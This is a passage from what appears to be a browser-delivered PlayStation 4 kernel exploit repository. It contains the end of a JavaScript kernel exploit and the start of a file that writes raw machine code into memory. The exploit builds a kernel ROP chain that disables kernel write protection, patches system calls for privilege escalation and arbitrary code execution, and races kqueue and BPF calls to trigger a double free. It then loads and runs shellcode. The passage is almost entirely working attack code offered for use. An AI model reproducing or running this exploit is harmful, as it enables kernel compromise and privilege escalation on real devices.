221 |     krop.push(window.gadgets["mov rbp, rsp"]);
222 | 
223 |     var rboff = topofchain - krop.count * 8 + 0x28;
224 | 
225 |     krop.push(offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
226 |     krop.push(window.gadgets["pop rax"]);
227 |     krop.push(rboff);
228 |     krop.push(window.gadgets["add rdi, rax"]);
229 | 
230 |     krop.push(window.gadgets["mov rax, [rdi]"]);
231 |     krop.push(window.gadgets["pop rsi"]);
232 |     krop.push(0x2FA);
233 |     krop.push(window.gadgets["add rax, rsi"]);
234 |     krop.push(window.gadgets["mov [rdi], rax"]);
235 | 
236 |     var shellbuf = p.malloc32(0x1000);
237 | 
238 |     // Save context of cr0 register
239 |     krop.push(window.gadgets["pop rdi"]); // save address in usermode
240 |     krop.push(kscratch);
241 |     krop.push(window.gadgets["mov [rdi], rax"]);
242 |     krop.push(window.gadgets["pop rsi"]);
243 |     krop.push(0xC54B4);
244 |     krop.push(window.gadgets["add rax, rsi"]);
245 |     krop.push(window.gadgets["pop rdi"]);
246 |     krop.push(kscratch.add32(0x08));
247 |     krop.push(window.gadgets["mov [rdi], rax"]);
248 |     krop.push(window.gadgets["jmp rax"]);
249 |     krop.push(window.gadgets["pop rdi"]); // save cr0
250 |     krop.push(kscratch.add32(0x10));
251 | 
252 |     // Disable kernel write protection for .text
253 |     krop.push(window.gadgets["mov [rdi], rax"]); // Save cr0 register
254 |     krop.push(window.gadgets["pop rsi"]);
255 |     krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
256 |     krop.push(window.gadgets["and rax, rsi"]);
257 |     krop.push(window.gadgets["mov rdx, rax"]);
258 |     krop.push(window.gadgets["pop rax"]);
259 |     krop.push(kscratch.add32(8));
260 |     krop.push(window.gadgets["mov rax, [rax]"]);
261 |     krop.push(window.gadgets["pop rsi"]);
262 |     krop.push(0x9);
263 |     krop.push(window.gadgets["add rax, rsi"]);
264 |     krop.push(window.gadgets["mov rdi, rax"]);
265 |     krop.push(window.gadgets["mov rax, rdx"]);
266 |     krop.push(window.gadgets["jmp rdi"]);
267 | 
268 |     krop.push(window.gadgets["pop rax"]);
269 |     krop.push(kscratch);
270 |     krop.push(window.gadgets["mov rax, [rax]"]);
271 |     krop.push(window.gadgets["pop rsi"]);
272 |     krop.push(0x3609A);
273 |     krop.push(window.gadgets["add rax, rsi"]);
274 |     krop.push(window.gadgets["mov rax, [rax]"]);
275 |     krop.push(window.gadgets["pop rdi"]);
276 |     krop.push(kscratch.add32(0x330));
277 |     krop.push(window.gadgets["mov [rdi], rax"]);
278 | 
279 |     // Patch sys_mprotect: Allow RWX mapping
280 |     patch_mprotect = new int64(0x9090FA38, 0x90909090);
281 |     kpatch(0x3609A, patch_mprotect);
282 | 
283 |     // Patch bpf_cdevsw: add back in bpfwrite() implementation for kernel primitives
284 |     kpatch(0x133C344, shellbuf);
285 | 
286 |     // Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
287 |     var patch_sys_setuid_offset = new int64(0xFFEE6F06, 0xFFFFFFFF);
288 |     var patch_sys_setuid = new int64(0x000000B8, 0xC4894100);
289 |     kpatch(patch_sys_setuid_offset, patch_sys_setuid);
290 | 
291 |     // Patch amd64_syscall: syscall instruction allowed anywhere
292 |     var patch_amd64_syscall_offset1 = new int64(0xFFE92927, 0xFFFFFFFF);
293 |     var patch_amd64_syscall_offset2 = new int64(0xFFE92945, 0xFFFFFFFF);
294 |     var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49);
295 |     var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090);
296 |     kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
297 |     kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
298 | 
299 |     // Patch: sys_mmap: allow RWX mapping from anywhere
300 |     var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF);
301 |     var patch_sys_mmap = new int64(0x37B64037, 0x3145C031);
302 |     kpatch(patch_sys_mmap_offset, patch_sys_mmap);
303 | 
304 |     // Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
305 |     var patch_sys_dynlib_dlsym_1 = new int64(0x000000E9, 0x8B489000);
306 |     var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090);
307 |     kpatch(0xCA3CE,  patch_sys_dynlib_dlsym_1);
308 |     kpatch(0x144AB4, patch_sys_dynlib_dlsym_2);
309 | 
310 |     // Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
311 |     var patch_sys_exec_1 = new int64(0x00F0ECB4, 0);
312 |     var patch_sys_exec_2A = new int64(0x00F0ECBC, 0);
313 |     var patch_sys_exec_2B = new int64(0xFFEA58F4, 0xFFFFFFFF);
314 |     var patch_sys_exec_3 = new int64(0x00F0ECDC, 0);
315 |     var patch_sys_exec_param1 = new int64(0x02, 0);
316 |     var patch_sys_exec_param3 = new int64(0, 1);
317 |     kpatch(patch_sys_exec_1, patch_sys_exec_param1);
318 |     kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
319 |     kpatch(patch_sys_exec_3, patch_sys_exec_param3);
320 | 
321 |     // Enable kernel write protection for .text
322 |     krop.push(window.gadgets["pop rax"]);
323 |     krop.push(kscratch.add32(0x08));
324 |     krop.push(window.gadgets["mov rax, [rax]"]);
325 |     krop.push(window.gadgets["pop rsi"]);
326 |     krop.push(0x09);
327 |     krop.push(window.gadgets["add rax, rsi"]);
328 |     krop.push(window.gadgets["mov rdi, rax"]);
329 |     krop.push(window.gadgets["pop rax"]);
330 |     krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
331 |     krop.push(window.gadgets["mov rax, [rax]"]);
332 |     krop.push(window.gadgets["jmp rdi"]);
333 | 
334 |     krop.push(offsetToWebKit(0x5CDB9)); // Clean up stack
335 |     krop.push(kscratch.add32(0x1000));
336 | 
337 |     var kq = p.malloc32(0x10);
338 |     var kev = p.malloc32(0x100);
339 |     kev.backing[0] = sock;
340 |     kev.backing[2] = 0x1ffff;
341 |     kev.backing[3] = 1;
342 |     kev.backing[4] = 5;
343 | 
344 |     // Shellcode to clean up memory
345 |     var shcode = [0x00008be9, 0x90909000, 0x90909090, 0x90909090, 0x0082b955, 0x8948c000, 0x415641e5, 0x53544155, 0x8949320f, 0xbbc089d4, 0x00000100, 0x20e4c149, 0x48c40949, 0x0096058d, 0x8d490000, 0xfe402494, 0x8d4dffff, 0xe09024b4, 0x8d4d0010, 0x5e8024ac, 0x81490043, 0x4b7160c4, 0x10894801, 0x00401f0f, 0x000002ba, 0xe6894c00, 0x000800bf, 0xd6ff4100, 0x393d8d48, 0x48000000, 0xc031c689, 0x83d5ff41, 0xdc7501eb, 0x41c0315b, 0x415d415c, 0x90c35d5e, 0x3d8d4855, 0xffffff78, 0x8948f631, 0x00e95de5, 0x48000000, 0x000bc0c7, 0x89490000, 0xc3050fca, 0x6c616d6b, 0x3a636f6c, 0x25783020, 0x6c363130, 0x00000a58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
346 |     for (var i = 0; i < shcode.length; i++) {
347 |       shellbuf.backing[i] = shcode[i];
348 |     }
349 | 
350 |     // RACE!
351 |     var iters = 0;
352 |     start1();
353 |     while (1) {
354 |       race.count = 0;
355 | 
356 |       // Create a kqueue
357 |       race.push(window.syscalls[362]);
358 |       race.push(window.gadgets["pop rdi"]);
359 |       race.push(kq);
360 |       race.push(window.gadgets["mov [rdi], rax"]);
361 | 
362 |       // Race against the other thread
363 |       race.push(window.gadgets["ret"]);
364 |       race.push(window.gadgets["ret"]);
365 |       race.push(window.gadgets["ret"]);
366 |       race.push(window.gadgets["ret"]);
367 |       race.push_write8(loop1, interrupt1);
368 |       race.push(window.gadgets["pop rdi"]);
369 |       race.push(fd);
370 |       race.push(window.gadgets["pop rsi"]);
371 |       race.push(0x8010427B);
372 |       race.push(window.gadgets["pop rdx"]);
373 |       race.push(bpf_valid_prog);
374 |       race.push(window.syscalls[54]);
375 | 
376 |       // Attempt to trigger double free()
377 |       race.push(window.gadgets["pop rax"]);
378 |       race.push(kq);
379 |       race.push(window.gadgets["mov rax, [rax]"]);
380 |       race.push(window.gadgets["mov rdi, rax"]);
381 |       race.push(window.gadgets["pop rsi"]);
382 |       race.push(kev);
383 |       race.push(window.gadgets["pop rdx"]);
384 |       race.push(1);
385 |       race.push(window.gadgets["pop rcx"]);
386 |       race.push(0);
387 |       race.push(window.gadgets["pop r8"]);
388 |       race.push(0);
389 |       race.push(window.syscalls[363]);
390 | 
391 |       // Spray via ioctl
392 |       race.push(window.gadgets["pop rdi"]);
393 |       race.push(fd1);
394 |       race.push(window.gadgets["pop rsi"]);
395 |       race.push(0x8010427B);
396 |       race.push(window.gadgets["pop rdx"]);
397 |       race.push(bpf_spray_prog);
398 |       race.push(window.syscalls[54]);
399 | 
400 |       // Close the poisoned kqueue and run the kROP chain!
401 |       race.push(window.gadgets["pop rax"]);
402 |       race.push(kq);
403 |       race.push(window.gadgets["mov rax, [rax]"]);
404 |       race.push(window.gadgets["mov rdi, rax"]);
405 |       race.push(window.syscalls[6]);
406 |       iters++;
407 | 
408 |       // Gotta go fast!
409 |       race.run();
410 |       if (kscratch.backing[0] != 0) {
411 |         // Hey, we won!
412 | 
413 |         // Clean up memory
414 |         p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
415 |         p.fcall(shellbuf);
416 | 
417 |         // Refresh to a clean page
418 |         location.reload();
419 | 
420 |         return true;
421 |       }
422 |     }
423 |   } catch(ex) {
424 |     fail(ex)
425 |   }
426 | 
427 |   // failed
428 |   return false;
429 | }
430 | 
431 | kernExploit();
432 | 


--------------------------------------------------------------------------------
/www/reactPSPlus.js:
--------------------------------------------------------------------------------
  1 | function writeHomebrewEN(p, reactPSPlus, time) {
  2 | 	p.write4(reactPSPlus.add32(0x00000000), 0x00005be9);
  3 | 	p.write4(reactPSPlus.add32(0x00000004), 0x0f2e6600);
  4 | 	p.write4(reactPSPlus.add32(0x00000008), 0x0000841f);
  5 | 	p.write4(reactPSPlus.add32(0x0000000c), 0x90000000);
  6 | 	p.write4(reactPSPlus.add32(0x00000010), 0x000082b9);
  7 | 	p.write4(reactPSPlus.add32(0x00000014), 0x320f53c0);
  8 | 	p.write4(reactPSPlus.add32(0x00000018), 0xbfd18948);
  9 | 	p.write4(reactPSPlus.add32(0x0000001c), 0x0000000f);
 10 | 	p.write4(reactPSPlus.add32(0x00000020), 0x20e1c148);
 11 | 	p.write4(reactPSPlus.add32(0x00000024), 0x48cb8948);
 12 | 	p.write4(reactPSPlus.add32(0x00000028), 0x8d48c309);
 13 | 	p.write4(reactPSPlus.add32(0x0000002c), 0x6344d083);
 14 | 	p.write4(reactPSPlus.add32(0x00000030), 0x48d0ff00);
 15 | 	p.write4(reactPSPlus.add32(0x00000034), 0x3ed0838d);
 16 | 	p.write4(reactPSPlus.add32(0x00000038), 0xbf5b0063);
 17 | 	p.write4(reactPSPlus.add32(0x0000003c), time);
 18 | 	p.write4(reactPSPlus.add32(0x00000040), 0x0f66e0ff);
 19 | 	p.write4(reactPSPlus.add32(0x00000044), 0x0000441f);
 20 | 	p.write4(reactPSPlus.add32(0x00000048), 0x0ff98948);
 21 | 	p.write4(reactPSPlus.add32(0x0000004c), 0xd7894832);
 22 | 	p.write4(reactPSPlus.add32(0x00000050), 0x20e7c148);
 23 | 	p.write4(reactPSPlus.add32(0x00000054), 0xc3f80948);
 24 | 	p.write4(reactPSPlus.add32(0x00000058), 0x00841f0f);
 25 | 	p.write4(reactPSPlus.add32(0x0000005c), 0x00000000);
 26 | 	p.write4(reactPSPlus.add32(0x00000060), 0x0b40bb49);
 27 | 	p.write4(reactPSPlus.add32(0x00000064), 0x00000000);
 28 | 	p.write4(reactPSPlus.add32(0x00000068), 0x8d480000);
 29 | 	p.write4(reactPSPlus.add32(0x0000006c), 0xffffef15);
 30 | 	p.write4(reactPSPlus.add32(0x00000070), 0xda014cff);
 31 | 	p.write4(reactPSPlus.add32(0x00000074), 0xf470b848);
 32 | 	p.write4(reactPSPlus.add32(0x00000078), 0xffffffff);
 33 | 	p.write4(reactPSPlus.add32(0x0000007c), 0xb948ffff);
 34 | 	p.write4(reactPSPlus.add32(0x00000080), 0xfffff502);
 35 | 	p.write4(reactPSPlus.add32(0x00000084), 0xffffffff);
 36 | 	p.write4(reactPSPlus.add32(0x00000088), 0x8d485741);
 37 | 	p.write4(reactPSPlus.add32(0x0000008c), 0x89490234);
 38 | 	p.write4(reactPSPlus.add32(0x00000090), 0x000bbfd7);
 39 | 	p.write4(reactPSPlus.add32(0x00000094), 0xc0310000);
 40 | 	p.write4(reactPSPlus.add32(0x00000098), 0xffd10148);
 41 | 	p.write4(reactPSPlus.add32(0x0000009c), 0x41c031d1);
 42 | 	p.write4(reactPSPlus.add32(0x000000a0), 0x3148c35f);
 43 | 	p.write4(reactPSPlus.add32(0x000000a4), 0xca8949c0);
 44 | 	p.write4(reactPSPlus.add32(0x000000a8), 0x0172050f);
 45 | 	p.write4(reactPSPlus.add32(0x000000ac), 0x3d8348c3);
 46 | 	p.write4(reactPSPlus.add32(0x000000b0), 0x00000b8b);
 47 | 	p.write4(reactPSPlus.add32(0x000000b4), 0x50187400);
 48 | 	p.write4(reactPSPlus.add32(0x000000b8), 0x0b8215ff);
 49 | 	p.write4(reactPSPlus.add32(0x000000bc), 0x89590000);
 50 | 	p.write4(reactPSPlus.add32(0x000000c0), 0xc0c74808);
 51 | 	p.write4(reactPSPlus.add32(0x000000c4), 0xffffffff);
 52 | 	p.write4(reactPSPlus.add32(0x000000c8), 0xffc2c748);
 53 | 	p.write4(reactPSPlus.add32(0x000000cc), 0xc3ffffff);
 54 | 	p.write4(reactPSPlus.add32(0x000000d0), 0x25c0c748);
 55 | 	p.write4(reactPSPlus.add32(0x000000d4), 0xe9000000);
 56 | 	p.write4(reactPSPlus.add32(0x000000d8), 0xffffffc9);
 57 | 	p.write4(reactPSPlus.add32(0x000000dc), 0x36c0c748);
 58 | 	p.write4(reactPSPlus.add32(0x000000e0), 0xe9000000);
 59 | 	p.write4(reactPSPlus.add32(0x000000e4), 0xffffffbd);
 60 | 	p.write4(reactPSPlus.add32(0x000000e8), 0x0bc0c748);
 61 | 	p.write4(reactPSPlus.add32(0x000000ec), 0xe9000000);
 62 | 	p.write4(reactPSPlus.add32(0x000000f0), 0xffffffb1);
 63 | 	p.write4(reactPSPlus.add32(0x000000f4), 0x00401f0f);
 64 | 	p.write4(reactPSPlus.add32(0x000000f8), 0xbb495741);
 65 | 	p.write4(reactPSPlus.add32(0x000000fc), 0x00000aa8);
 66 | 	p.write4(reactPSPlus.add32(0x00000100), 0x00000000);
 67 | 	p.write4(reactPSPlus.add32(0x00000104), 0xed3d8d4c);
 68 | 	p.write4(reactPSPlus.add32(0x00000108), 0x41ffffff);
 69 | 	p.write4(reactPSPlus.add32(0x0000010c), 0xdf014d54);
 70 | 	p.write4(reactPSPlus.add32(0x00000110), 0x07b84855);
 71 | 	p.write4(reactPSPlus.add32(0x00000114), 0xfffffffc);
 72 | 	p.write4(reactPSPlus.add32(0x00000118), 0x53ffffff);
 73 | 	p.write4(reactPSPlus.add32(0x0000011c), 0x00a0bc49);
 74 | 	p.write4(reactPSPlus.add32(0x00000120), 0x00000000);
 75 | 	p.write4(reactPSPlus.add32(0x00000124), 0xbd480000);
 76 | 	p.write4(reactPSPlus.add32(0x00000128), 0x00000028);
 77 | 	p.write4(reactPSPlus.add32(0x0000012c), 0x00000000);
 78 | 	p.write4(reactPSPlus.add32(0x00000130), 0xfb10bb48);
 79 | 	p.write4(reactPSPlus.add32(0x00000134), 0xffffffff);
 80 | 	p.write4(reactPSPlus.add32(0x00000138), 0x8348ffff);
 81 | 	p.write4(reactPSPlus.add32(0x0000013c), 0x014c08ec);
 82 | 	p.write4(reactPSPlus.add32(0x00000140), 0x04c74bfb);
 83 | 	p.write4(reactPSPlus.add32(0x00000144), 0x0000003c);
 84 | 	p.write4(reactPSPlus.add32(0x00000148), 0x748d4a00);
 85 | 	p.write4(reactPSPlus.add32(0x0000014c), 0x8d49003d);
 86 | 	p.write4(reactPSPlus.add32(0x00000150), 0xd3ff073c);
 87 | 	p.write4(reactPSPlus.add32(0x00000154), 0x850fc085);
 88 | 	p.write4(reactPSPlus.add32(0x00000158), 0x000004bc);
 89 | 	p.write4(reactPSPlus.add32(0x0000015c), 0x0030b848);
 90 | 	p.write4(reactPSPlus.add32(0x00000160), 0x00000000);
 91 | 	p.write4(reactPSPlus.add32(0x00000164), 0x8b420000);
 92 | 	p.write4(reactPSPlus.add32(0x00000168), 0x49003d7c);
 93 | 	p.write4(reactPSPlus.add32(0x0000016c), 0x4807148d);
 94 | 	p.write4(reactPSPlus.add32(0x00000170), 0xfffab0bb);
 95 | 	p.write4(reactPSPlus.add32(0x00000174), 0xffffffff);
 96 | 	p.write4(reactPSPlus.add32(0x00000178), 0x3cb848ff);
 97 | 	p.write4(reactPSPlus.add32(0x0000017c), 0xfffffffc);
 98 | 	p.write4(reactPSPlus.add32(0x00000180), 0x4cffffff);
 99 | 	p.write4(reactPSPlus.add32(0x00000184), 0x8d49fb01);
100 | 	p.write4(reactPSPlus.add32(0x00000188), 0xd3ff0734);
101 | 	p.write4(reactPSPlus.add32(0x0000018c), 0x0068b848);
102 | 	p.write4(reactPSPlus.add32(0x00000190), 0x00000000);
103 | 	p.write4(reactPSPlus.add32(0x00000194), 0x8b420000);
104 | 	p.write4(reactPSPlus.add32(0x00000198), 0x49003d7c);
105 | 	p.write4(reactPSPlus.add32(0x0000019c), 0x4807148d);
106 | 	p.write4(reactPSPlus.add32(0x000001a0), 0xfffc4eb8);
107 | 	p.write4(reactPSPlus.add32(0x000001a4), 0xffffffff);
108 | 	p.write4(reactPSPlus.add32(0x000001a8), 0x348d49ff);
109 | 	p.write4(reactPSPlus.add32(0x000001ac), 0x42d3ff07);
110 | 	p.write4(reactPSPlus.add32(0x000001b0), 0x003d7c8b);
111 | 	p.write4(reactPSPlus.add32(0x000001b4), 0xfc5fb848);
112 | 	p.write4(reactPSPlus.add32(0x000001b8), 0xffffffff);
113 | 	p.write4(reactPSPlus.add32(0x000001bc), 0x8d4bffff);
114 | 	p.write4(reactPSPlus.add32(0x000001c0), 0x8d493c14);
115 | 	p.write4(reactPSPlus.add32(0x000001c4), 0xd3ff0734);
116 | 	p.write4(reactPSPlus.add32(0x000001c8), 0x0080b848);
117 | 	p.write4(reactPSPlus.add32(0x000001cc), 0x00000000);
118 | 	p.write4(reactPSPlus.add32(0x000001d0), 0x8b420000);
119 | 	p.write4(reactPSPlus.add32(0x000001d4), 0x49003d7c);
120 | 	p.write4(reactPSPlus.add32(0x000001d8), 0x4807148d);
121 | 	p.write4(reactPSPlus.add32(0x000001dc), 0xfffc67b8);
122 | 	p.write4(reactPSPlus.add32(0x000001e0), 0xffffffff);
123 | 	p.write4(reactPSPlus.add32(0x000001e4), 0x348d49ff);
124 | 	p.write4(reactPSPlus.add32(0x000001e8), 0x48d3ff07);
125 | 	p.write4(reactPSPlus.add32(0x000001ec), 0x0000c0b8);
126 | 	p.write4(reactPSPlus.add32(0x000001f0), 0x00000000);
127 | 	p.write4(reactPSPlus.add32(0x000001f4), 0x7c8b4200);
128 | 	p.write4(reactPSPlus.add32(0x000001f8), 0x8d49003d);
129 | 	p.write4(reactPSPlus.add32(0x000001fc), 0xb8480714);
130 | 	p.write4(reactPSPlus.add32(0x00000200), 0xfffffc76);
131 | 	p.write4(reactPSPlus.add32(0x00000204), 0xffffffff);
132 | 	p.write4(reactPSPlus.add32(0x00000208), 0x07348d49);
133 | 	p.write4(reactPSPlus.add32(0x0000020c), 0xb848d3ff);
134 | 	p.write4(reactPSPlus.add32(0x00000210), 0x000000e8);
135 | 	p.write4(reactPSPlus.add32(0x00000214), 0x00000000);
136 | 	p.write4(reactPSPlus.add32(0x00000218), 0x3d7c8b42);
137 | 	p.write4(reactPSPlus.add32(0x0000021c), 0x148d4900);
138 | 	p.write4(reactPSPlus.add32(0x00000220), 0x8fb84807);
139 | 	p.write4(reactPSPlus.add32(0x00000224), 0xfffffffc);
140 | 	p.write4(reactPSPlus.add32(0x00000228), 0x49ffffff);
141 | 	p.write4(reactPSPlus.add32(0x0000022c), 0xff07348d);
142 | 	p.write4(reactPSPlus.add32(0x00000230), 0x70b848d3);
143 | 	p.write4(reactPSPlus.add32(0x00000234), 0x00000000);
144 | 	p.write4(reactPSPlus.add32(0x00000238), 0x42000000);
145 | 	p.write4(reactPSPlus.add32(0x0000023c), 0x003d7c8b);
146 | 	p.write4(reactPSPlus.add32(0x00000240), 0x07148d49);
147 | 	p.write4(reactPSPlus.add32(0x00000244), 0xfcadb848);
148 | 	p.write4(reactPSPlus.add32(0x00000248), 0xffffffff);
149 | 	p.write4(reactPSPlus.add32(0x0000024c), 0x8d49ffff);
150 | 	p.write4(reactPSPlus.add32(0x00000250), 0xd3ff0734);
151 | 	p.write4(reactPSPlus.add32(0x00000254), 0x00b8b848);
152 | 	p.write4(reactPSPlus.add32(0x00000258), 0x00000000);
153 | 	p.write4(reactPSPlus.add32(0x0000025c), 0x8b420000);
154 | 	p.write4(reactPSPlus.add32(0x00000260), 0x49003d7c);
155 | 	p.write4(reactPSPlus.add32(0x00000264), 0x4807148d);
156 | 	p.write4(reactPSPlus.add32(0x00000268), 0xfffcc6b8);
157 | 	p.write4(reactPSPlus.add32(0x0000026c), 0xffffffff);
158 | 	p.write4(reactPSPlus.add32(0x00000270), 0x348d49ff);
159 | 	p.write4(reactPSPlus.add32(0x00000274), 0x48d3ff07);
160 | 	p.write4(reactPSPlus.add32(0x00000278), 0x000110b8);
161 | 	p.write4(reactPSPlus.add32(0x0000027c), 0x00000000);
162 | 	p.write4(reactPSPlus.add32(0x00000280), 0x7c8b4200);
163 | 	p.write4(reactPSPlus.add32(0x00000284), 0x8d49003d);
164 | 	p.write4(reactPSPlus.add32(0x00000288), 0xb8480714);
165 | 	p.write4(reactPSPlus.add32(0x0000028c), 0xfffffcd4);
166 | 	p.write4(reactPSPlus.add32(0x00000290), 0xffffffff);
167 | 	p.write4(reactPSPlus.add32(0x00000294), 0x07348d49);
168 | 	p.write4(reactPSPlus.add32(0x00000298), 0xb848d3ff);
169 | 	p.write4(reactPSPlus.add32(0x0000029c), 0x00000090);
170 | 	p.write4(reactPSPlus.add32(0x000002a0), 0x00000000);
171 | 	p.write4(reactPSPlus.add32(0x000002a4), 0x3d7c8b42);
172 | 	p.write4(reactPSPlus.add32(0x000002a8), 0x148d4900);
173 | 	p.write4(reactPSPlus.add32(0x000002ac), 0xe2b84807);
174 | 	p.write4(reactPSPlus.add32(0x000002b0), 0xfffffffc);
175 | 	p.write4(reactPSPlus.add32(0x000002b4), 0x49ffffff);
176 | 	p.write4(reactPSPlus.add32(0x000002b8), 0xff07348d);
177 | 	p.write4(reactPSPlus.add32(0x000002bc), 0xb0b848d3);
178 | 	p.write4(reactPSPlus.add32(0x000002c0), 0x00000000);
179 | 	p.write4(reactPSPlus.add32(0x000002c4), 0x42000000);
180 | 	p.write4(reactPSPlus.add32(0x000002c8), 0x003d7c8b);
181 | 	p.write4(reactPSPlus.add32(0x000002cc), 0x07148d49);
182 | 	p.write4(reactPSPlus.add32(0x000002d0), 0xfcf0b848);
183 | 	p.write4(reactPSPlus.add32(0x000002d4), 0xffffffff);
184 | 	p.write4(reactPSPlus.add32(0x000002d8), 0x8d49ffff);
185 | 	p.write4(reactPSPlus.add32(0x000002dc), 0xd3ff0734);
186 | 	p.write4(reactPSPlus.add32(0x000002e0), 0x00c8b848);
187 | 	p.write4(reactPSPlus.add32(0x000002e4), 0x00000000);
188 | 	p.write4(reactPSPlus.add32(0x000002e8), 0x8b420000);
189 | 	p.write4(reactPSPlus.add32(0x000002ec), 0x49003d7c);
190 | 	p.write4(reactPSPlus.add32(0x000002f0), 0x4807148d);
191 | 	p.write4(reactPSPlus.add32(0x000002f4), 0xfffcffb8);
192 | 	p.write4(reactPSPlus.add32(0x000002f8), 0xffffffff);
193 | 	p.write4(reactPSPlus.add32(0x000002fc), 0x348d49ff);
194 | 	p.write4(reactPSPlus.add32(0x00000300), 0x48d3ff07);
195 | 	p.write4(reactPSPlus.add32(0x00000304), 0x000048b8);
196 | 	p.write4(reactPSPlus.add32(0x00000308), 0x00000000);
197 | 	p.write4(reactPSPlus.add32(0x0000030c), 0x7c8b4200);
198 | 	p.write4(reactPSPlus.add32(0x00000310), 0x8d49003d);
199 | 	p.write4(reactPSPlus.add32(0x00000314), 0xb8480714);
200 | 	p.write4(reactPSPlus.add32(0x00000318), 0xfffffd0e);
201 | 	p.write4(reactPSPlus.add32(0x0000031c), 0xffffffff);
202 | 	p.write4(reactPSPlus.add32(0x00000320), 0x07348d49);
203 | 	p.write4(reactPSPlus.add32(0x00000324), 0xb848d3ff);
204 | 	p.write4(reactPSPlus.add32(0x00000328), 0x000000f0);
205 | 	p.write4(reactPSPlus.add32(0x0000032c), 0x00000000);
206 | 	p.write4(reactPSPlus.add32(0x00000330), 0x3d7c8b42);
207 | 	p.write4(reactPSPlus.add32(0x00000334), 0x148d4900);
208 | 	p.write4(reactPSPlus.add32(0x00000338), 0x1db84807);
209 | 	p.write4(reactPSPlus.add32(0x0000033c), 0xfffffffd);
210 | 	p.write4(reactPSPlus.add32(0x00000340), 0x49ffffff);
211 | 	p.write4(reactPSPlus.add32(0x00000344), 0xff07348d);
212 | 	p.write4(reactPSPlus.add32(0x00000348), 0x18b848d3);
213 | 	p.write4(reactPSPlus.add32(0x0000034c), 0x00000000);
214 | 	p.write4(reactPSPlus.add32(0x00000350), 0x42000000);
215 | 	p.write4(reactPSPlus.add32(0x00000354), 0x003d7c8b);
216 | 	p.write4(reactPSPlus.add32(0x00000358), 0x07148d49);
217 | 	p.write4(reactPSPlus.add32(0x0000035c), 0xfd2db848);
218 | 	p.write4(reactPSPlus.add32(0x00000360), 0xffffffff);
219 | 	p.write4(reactPSPlus.add32(0x00000364), 0x8d49ffff);
220 | 	p.write4(reactPSPlus.add32(0x00000368), 0xd3ff0734);
221 | 	p.write4(reactPSPlus.add32(0x0000036c), 0x00d8b848);
222 | 	p.write4(reactPSPlus.add32(0x00000370), 0x00000000);
223 | 	p.write4(reactPSPlus.add32(0x00000374), 0x8b420000);
224 | 	p.write4(reactPSPlus.add32(0x00000378), 0x49003d7c);
225 | 	p.write4(reactPSPlus.add32(0x0000037c), 0x4807148d);
226 | 	p.write4(reactPSPlus.add32(0x00000380), 0xfffd43b8);
227 | 	p.write4(reactPSPlus.add32(0x00000384), 0xffffffff);
228 | 	p.write4(reactPSPlus.add32(0x00000388), 0x348d49ff);
229 | 	p.write4(reactPSPlus.add32(0x0000038c), 0x48d3ff07);
230 | 	p.write4(reactPSPlus.add32(0x00000390), 0x000050b8);
231 | 	p.write4(reactPSPlus.add32(0x00000394), 0x00000000);
232 | 	p.write4(reactPSPlus.add32(0x00000398), 0x7c8b4200);
233 | 	p.write4(reactPSPlus.add32(0x0000039c), 0x8d49003d);
234 | 	p.write4(reactPSPlus.add32(0x000003a0), 0xb8480714);
235 | 	p.write4(reactPSPlus.add32(0x000003a4), 0xfffffd5b);
236 | 	p.write4(reactPSPlus.add32(0x000003a8), 0xffffffff);
237 | 	p.write4(reactPSPlus.add32(0x000003ac), 0x07348d49);
238 | 	p.write4(reactPSPlus.add32(0x000003b0), 0xb848d3ff);
239 | 	p.write4(reactPSPlus.add32(0x000003b4), 0x00000088);
240 | 	p.write4(reactPSPlus.add32(0x000003b8), 0x00000000);
241 | 	p.write4(reactPSPlus.add32(0x000003bc), 0x3d7c8b42);
242 | 	p.write4(reactPSPlus.add32(0x000003c0), 0x148d4900);
243 | 	p.write4(reactPSPlus.add32(0x000003c4), 0x72b84807);
244 | 	p.write4(reactPSPlus.add32(0x000003c8), 0xfffffffd);
245 | 	p.write4(reactPSPlus.add32(0x000003cc), 0x49ffffff);
246 | 	p.write4(reactPSPlus.add32(0x000003d0), 0xff07348d);
247 | 	p.write4(reactPSPlus.add32(0x000003d4), 0x28b848d3);
248 | 	p.write4(reactPSPlus.add32(0x000003d8), 0x00000001);
249 | 	p.write4(reactPSPlus.add32(0x000003dc), 0x42000000);
250 | 	p.write4(reactPSPlus.add32(0x000003e0), 0x003d7c8b);
251 | 	p.write4(reactPSPlus.add32(0x000003e4), 0x07148d49);
252 | 	p.write4(reactPSPlus.add32(0x000003e8), 0xfd79b848);
253 | 	p.write4(reactPSPlus.add32(0x000003ec), 0xffffffff);
254 | 	p.write4(reactPSPlus.add32(0x000003f0), 0x8d49ffff);
255 | 	p.write4(reactPSPlus.add32(0x000003f4), 0xd3ff0734);
256 | 	p.write4(reactPSPlus.add32(0x000003f8), 0x0078b848);
257 | 	p.write4(reactPSPlus.add32(0x000003fc), 0x00000000);
258 | 	p.write4(reactPSPlus.add32(0x00000400), 0x8b420000);
259 | 	p.write4(reactPSPlus.add32(0x00000404), 0x49003d7c);
260 | 	p.write4(reactPSPlus.add32(0x00000408), 0x4807148d);
261 | 	p.write4(reactPSPlus.add32(0x0000040c), 0xfffd86b8);
262 | 	p.write4(reactPSPlus.add32(0x00000410), 0xffffffff);
263 | 	p.write4(reactPSPlus.add32(0x00000414), 0x348d49ff);
264 | 	p.write4(reactPSPlus.add32(0x00000418), 0x48d3ff07);
265 | 	p.write4(reactPSPlus.add32(0x0000041c), 0x000038b8);
266 | 	p.write4(reactPSPlus.add32(0x00000420), 0x00000000);
